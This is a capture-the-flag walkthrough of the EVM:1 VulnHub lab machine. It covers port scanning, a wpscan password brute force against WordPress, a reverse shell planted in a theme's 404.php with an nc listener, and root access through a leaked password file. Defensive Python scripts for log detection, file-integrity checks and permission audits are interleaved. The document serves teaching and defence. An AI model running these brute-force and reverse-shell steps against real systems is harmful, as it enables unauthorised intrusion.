WALKTHROUGH EVM:1
Hi everyone. Today we discuss a new VM, EVM: 1. This machine was designed by Ic0de and is part of the EVM series.
It works better with VirtualBox than with VMware.
You can download the VM from this link:
https://download.vulnhub.com/evm/EVM.ova
On the description page the author describes it as a super friendly box intended for beginners.
Network Scanning
So let's start off. First, as usual, we run netdiscover -i vboxnet0 to find the target's IP address.
Then we run a full port scan. This is what I got from a normal nmap scan:
# nmap -v 192.168.56.103 [ here -v is verbose mode ]
On this machine ports 22, 53, 80, 110, 139, 143 and 445 are open.
Next we use nmap again for a more detailed scan of those ports. Let's start:
# nmap -v -sC -sV -sT -p22,53,80,110,139,143,445 -O -A 192.168.56.103
[ Here -sC is --script=default, -sV version detection, -sT TCP connect scan, -p the port list, -O OS detection, and -A enables OS detection, version detection, script scanning and traceroute ]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a2:d3:34:13:62:b1:18:a3:dd:db:35:c5:5a:b7:c0:78 (RSA)
| 256 85:48:53:2a:50:c5:a0:b7:1a:ee:a4:d8:12:8e:1c:ce (ECDSA)
|_ 256 36:22:92:c7:32:22:e3:34:51:bc:0e:74:9f:1c:db:aa (ED25519)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES CAPA SASL TOP PIPELINING AUTH-RESP-CODE UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: LOGINDISABLEDA0001 more LITERAL+ have IMAP4rev1 post-login listed SASL-IR IDLE capabilities OK Pre-login ENABLE LOGIN-REFERRALS ID
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 08:00:27:45:FF:57 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.016 days (since Sun Feb 14 23:12:04 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m58s, deviation: 2h53m12s, median: -1s
| nbstat: NetBIOS name: UBUNTU-EXTERMEL, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| UBUNTU-EXTERMEL<00> Flags: <unique><active>
| UBUNTU-EXTERMEL<03> Flags: <unique><active>
| UBUNTU-EXTERMEL<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: ubuntu-extermely-vulnerable-m4ch1ine
| NetBIOS computer name: UBUNTU-EXTERMELY-VULNERABLE-M4CH1INE\x00
| Domain name: \x00
| FQDN: ubuntu-extermely-vulnerable-m4ch1ine
|_ System time: 2021-02-14T13:05:29-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-14T18:05:29
|_ start_date: N/A
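Reading a scan like the one above is mostly about picking out the handful of lines that matter. The script below is an added example (not part of the original walkthrough) that parses the port table and NSE script lines of nmap's normal output into dicts and then turns them into defender-facing notes: the default Apache page, the disclosed BIND version, cleartext mail listeners, and the SMB signing result. The sample text is a constructed subset of the scan lines shown above; the smb.conf and named.conf settings named in the notes are standard Samba and BIND options.

```python
import re

# Constructed sample: a subset of the nmap lines from the scan above.
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
|_ bind.version: 9.10.3-P4-Ubuntu
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
110/tcp open pop3 Dovecot pop3d
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Host script results:
| smb-security-mode:
|_ message_signing: disabled (dangerous, but default)
"""

# "22/tcp open ssh OpenSSH 7.2p2 ..." -> port, proto, state, service, version
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")
# "|_ bind.version: 9.10.3-P4-Ubuntu" -> key, value
SCRIPT_RE = re.compile(r"^\|_?\s*([\w.-]+):\s*(.*)$")


def parse(text):
    """Return (ports, scripts). NSE key/value lines are attached to the
    port they follow, or to 'host' after the 'Host script results:' marker."""
    ports, scripts = [], {}
    current = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports.append({"port": current, "proto": m.group(2), "state": m.group(3),
                          "service": m.group(4), "version": m.group(5).strip()})
            continue
        if line.startswith("Host script results"):
            current = "host"
            continue
        s = SCRIPT_RE.match(line)
        if s and current is not None:
            scripts.setdefault(current, {})[s.group(1)] = s.group(2)
    return ports, scripts


def triage(text):
    """Map the parsed scan to (port, note) pairs a defender would act on."""
    ports, scripts = parse(text)
    notes = []
    for p in ports:
        if p["state"] != "open":
            continue
        nse = scripts.get(p["port"], {})
        if p["service"] == "http" and "Default Page" in nse.get("http-title", ""):
            notes.append((p["port"], "default Apache page: unconfigured web root, "
                                     "check for leftover files such as info.php"))
        if p["service"] == "domain" and "bind.version" in nse:
            notes.append((p["port"], "BIND version disclosed via NSID; "
                                     "set version \"none\"; in named.conf options"))
        if p["service"] in ("pop3", "imap"):
            notes.append((p["port"], f"cleartext {p['service']} listener; require TLS"))
    host = scripts.get("host", {})
    if host.get("message_signing", "").startswith("disabled"):
        notes.append(("host", "SMB message signing disabled: relay/tampering risk, "
                              "set server signing = mandatory in smb.conf"))
    return notes


if __name__ == "__main__":
    for port, note in triage(NMAP_OUTPUT):
        print(f"{port}: {note}")
```

The parser deliberately only keys on the port number and the `|`/`|_` prefix that nmap uses for NSE output, so it works on the page's single-spaced copy as well as on nmap's column-aligned original.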
Enumeration
As usual, we thought that port 80 would be our way in, so we tried to enumerate it as much as possible. We visit the page…
We found the default Apache page. So I check for a /robots.txt file; nothing was found there.
What is a robots.txt file?
Robots.txt is a text file webmasters create to instruct web robots (typically search engine robots) how to crawl pages on their website. The robots.txt file is part of the robots exclusion protocol (REP), a group of web standards that regulate how robots crawl the web, access and index content, and serve that content up to users.
Next we move on to HTTP directory busting, starting with the nikto command:
# nikto -h http://192.168.56.103
It found /info.php, so I open /info.php in the browser.
It only shows phpinfo output and the PHP version, so I use the dirb command to find more:
# dirb http://192.168.56.103
We find some directories. I open them one by one in the browser and find some pages at http://192.168.56.103/wordpress/.
At the bottom we can see a login link; clicking it redirects us to the WordPress login page.
I go to the terminal and run wpscan to enumerate usernames:
# wpscan --url http://192.168.56.103 --enumerate u
The above command finds the username c0rrupt3d_brain. Next I brute-force the password for this user:
# wpscan --url http://192.168.56.103/wordpress -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
We find:
| Username: c0rrupt3d_brain, Password: 24992499
After a minute we successfully crack the password. Let's log in to the WordPress panel and upload our reverse shell.
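The two wpscan steps above (author enumeration, then a dictionary attack on wp-login.php) leave a very recognisable trail in the web server's access log, which is the natural place to catch them. The script below is an added example, not code from the original walkthrough: it parses Apache combined-format log lines and raises an alert for `?author=` probing, for a WPScan user agent, and for a burst of login POSTs from one address inside a sliding 60-second window. The log lines, the client addresses and the user-agent string are all constructed for the example; a real WPScan run identifies itself differently and a tuned attacker will change the agent anyway, so the POST-rate rule is the one that matters.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache "combined" log format: ip ident user [ts] "req" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def parse_line(line):
    """Return a dict for one log line, or None if it is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def detect(lines, window=timedelta(seconds=60), threshold=10):
    """Return a de-duplicated list of (ip, reason) alerts for the given lines."""
    alerts = {}  # insertion-ordered set of (ip, reason)
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if "author=" in rec["path"]:
            alerts[(rec["ip"], "user enumeration via ?author= query")] = None
        if "wpscan" in rec["ua"].lower():
            alerts[(rec["ip"], "WPScan user agent")] = None
        if rec["method"] == "POST" and rec["path"].endswith("/wp-login.php"):
            posts[rec["ip"]].append(rec["ts"])
    # sliding window: most login POSTs from one ip inside any `window`-long span
    for ip, times in posts.items():
        times.sort()
        best = start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            secs = int(window.total_seconds())
            alerts[(ip, f"{best} wp-login POSTs within {secs}s")] = None
    return list(alerts)


def build_sample_log():
    """Constructed log: one probing client plus one normal login from elsewhere."""
    base = datetime(2021, 2, 14, 13, 5, 0, tzinfo=timezone(timedelta(hours=-5)))
    fmt = lambda t: t.strftime("%d/%b/%Y:%H:%M:%S %z")
    ua = "WPScan v3.8.7 (constructed UA)"
    lines = [f'192.168.56.1 - - [{fmt(base)}] "GET /wordpress/?author=1 HTTP/1.1" '
             f'301 0 "-" "{ua}"']
    for i in range(12):  # twelve password guesses two seconds apart
        t = base + timedelta(seconds=2 * i + 1)
        lines.append(f'192.168.56.1 - - [{fmt(t)}] "POST /wordpress/wp-login.php HTTP/1.1" '
                     f'200 4523 "-" "{ua}"')
    t = base + timedelta(seconds=30)  # a single legitimate login from another host
    lines.append(f'192.168.56.20 - - [{fmt(t)}] "POST /wordpress/wp-login.php HTTP/1.1" '
                 f'302 0 "-" "Mozilla/5.0"')
    return lines


if __name__ == "__main__":
    for ip, reason in detect(build_sample_log()):
        print(ip, "-", reason)
```

On the constructed log the probing address is reported three times and the legitimate client not at all. The 200 status on a failed WordPress login (the form is re-rendered) versus the 302 redirect on success is a second signal worth adding once you have real logs to tune against.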
Now we log in as c0rrupt3d_brain and enter the WordPress dashboard.
It's time to get a reverse shell from WordPress.
Go to Appearance > Theme Editor.
Then click on "Select theme to edit", choose the theme "Twenty Nineteen" and click "Select".
Now select "404 Template (404.php)".
Replace the contents of 404.php with our reverse shell payload.
Start a listener in the terminal with nc -nlvp 443, then visit this URL:
URL: http://192.168.56.103/wordpress/wp-content/themes/twentynineteen/404.php
We get a reverse connection.
There is no TTY here,
so this command solves the problem:
Command: python -c 'import pty; pty.spawn("/bin/bash")'
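The theme editor step works because WordPress lets an administrator rewrite PHP files in the web root from the dashboard. WordPress's own switch for this is `define('DISALLOW_FILE_EDIT', true);` in wp-config.php, which removes the editor entirely; beyond that, a hash baseline of the theme and plugin directories shows exactly which file was rewritten, as happened to 404.php above. The following is an added example, not part of the original post: it checks a wp-config.php text for that constant, builds a SHA-256 baseline of a directory tree, and reports changed, added and removed files. The theme tree it uses is a constructed stand-in built in a temporary directory, and the "edit" is placeholder text, not the payload from the walkthrough.

```python
import hashlib
import os
import re
import tempfile

# matches define('DISALLOW_FILE_EDIT', true); with either quote style
DISALLOW_RE = re.compile(r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.I)


def file_edit_disabled(wp_config_text):
    """True if the wp-config.php text turns the dashboard file editor off."""
    return DISALLOW_RE.search(wp_config_text) is not None


def hash_tree(root):
    """SHA-256 of every file under root, keyed by path relative to root."""
    result = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                result[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return result


def compare(baseline, current):
    """Diff two hash maps into sorted lists of changed, added and removed paths."""
    return {
        "changed": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def demo():
    """Constructed scenario: baseline a theme, rewrite 404.php, drop a new file."""
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "twentynineteen")
        os.makedirs(theme)
        for name in ("404.php", "index.php", "style.css"):  # stand-in theme files
            with open(os.path.join(theme, name), "w") as fh:
                fh.write(f"original {name}\n")
        before = hash_tree(root)
        # simulate what the theme editor step above does to 404.php (placeholder text)
        with open(os.path.join(theme, "404.php"), "w") as fh:
            fh.write("contents replaced via the theme editor\n")
        with open(os.path.join(theme, "cache.php"), "w") as fh:
            fh.write("new file that was not in the baseline\n")
        after = hash_tree(root)
        return compare(before, after)


if __name__ == "__main__":
    print(file_edit_disabled("define('DISALLOW_FILE_EDIT', true);"))
    print(demo())
```

In practice the baseline is taken right after deployment and stored off the web server, and the comparison runs on a schedule; any change to a .php file under wp-content that does not coincide with a known update is worth an immediate look.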
First we cat /etc/passwd to see how many users there are. Then I cd to /home and find one user, root3r. I enter this user's home directory and find several files:
www-data@ubuntu-extermely-vulnerable-m4ch1ine:/home/root3r$ ls -lah
ls -lah
total 40K
drwxr-xr-x 3 www-data www-data 4.0K Nov 1 2019 .
drwxr-xr-x 3 root root 4.0K Oct 30 2019 ..
-rw-r--r-- 1 www-data www-data 515 Oct 30 2019 .bash_history
-rw-r--r-- 1 www-data www-data 220 Oct 30 2019 .bash_logout
-rw-r--r-- 1 www-data www-data 3.7K Oct 30 2019 .bashrc
drwxr-xr-x 2 www-data www-data 4.0K Oct 30 2019 .cache
-rw-r--r-- 1 www-data www-data 22 Oct 30 2019 .mysql_history
-rw-r--r-- 1 www-data www-data 655 Oct 30 2019 .profile
-rw-r--r-- 1 www-data www-data 8 Oct 31 2019 .root_password_ssh.txt
-rw-r--r-- 1 www-data www-data 0 Oct 30 2019 .sudo_as_admin_successful
-rw-r--r-- 1 root root 4 Nov 1 2019 test.txt
I go through them one by one and find a password in the file .root_password_ssh.txt.
So I run su - root and enter the password, willy26.
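The privilege escalation above needed no exploit at all: a world-readable file with "password" in its name, sitting in a home directory next to world-readable shell and MySQL histories. That is the kind of thing a periodic audit catches. The script below is an added example (not part of the original walkthrough) that walks a home-directory tree and flags credential-looking filenames and history files whose mode grants read access to others. It runs against a constructed tree in a temporary directory modelled on the listing above, with a correctly locked-down id_rsa included to show that the rule keys on permissions, not just names; the filename patterns are an assumption and should be extended for your own environment.

```python
import os
import re
import stat
import tempfile

# filenames that usually hold secrets (assumed patterns; extend as needed)
SENSITIVE_NAME = re.compile(r"passw(or)?d|secret|cred|token|id_rsa|\.pem$", re.I)
# interactive histories that often contain pasted passwords or connection strings
HISTORY_NAME = re.compile(r"^\.(bash|mysql|psql|python)_history$")


def audit_homes(home_root):
    """Return sorted (relative path, reason) findings for files under home_root."""
    findings = []
    for dirpath, _dirs, files in os.walk(home_root):
        for name in files:
            full = os.path.join(dirpath, name)
            mode = stat.S_IMODE(os.lstat(full).st_mode)
            other_readable = bool(mode & stat.S_IROTH)
            rel = os.path.relpath(full, home_root)
            if SENSITIVE_NAME.search(name) and other_readable:
                findings.append((rel, "credential-like file readable by everyone"))
            elif HISTORY_NAME.match(name) and other_readable:
                findings.append((rel, "shell/db history readable by everyone"))
    return sorted(findings)


def demo():
    """Constructed home tree modelled on the root3r listing above."""
    with tempfile.TemporaryDirectory() as home_root:
        user = os.path.join(home_root, "root3r")
        os.makedirs(user)
        sample = {
            ".root_password_ssh.txt": 0o644,  # the file that gave away root here
            ".mysql_history": 0o644,
            ".bash_history": 0o644,
            ".profile": 0o644,                # harmless, should not be flagged
            "id_rsa": 0o600,                  # sensitive name, but correctly restricted
        }
        for name, mode in sample.items():
            path = os.path.join(user, name)
            with open(path, "w") as fh:
                fh.write("constructed placeholder\n")
            os.chmod(path, mode)
        return audit_homes(home_root)


if __name__ == "__main__":
    for path, reason in demo():
        print(f"{path}: {reason}")
```

Pointing `audit_homes` at a real /home (or /root) from a cron job, and adding an ownership check for home directories not owned by their user (the listing above shows root3r's home owned by www-data), turns this into a cheap recurring control.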
# cat proof.txt
cat proof.txt
voila you have successfully pwned me :) !!!
:D
root@ubuntu-extermely-vulnerable-m4ch1ine:~# id
id
uid=0(root) gid=0(root) groups=0(root)
Proved.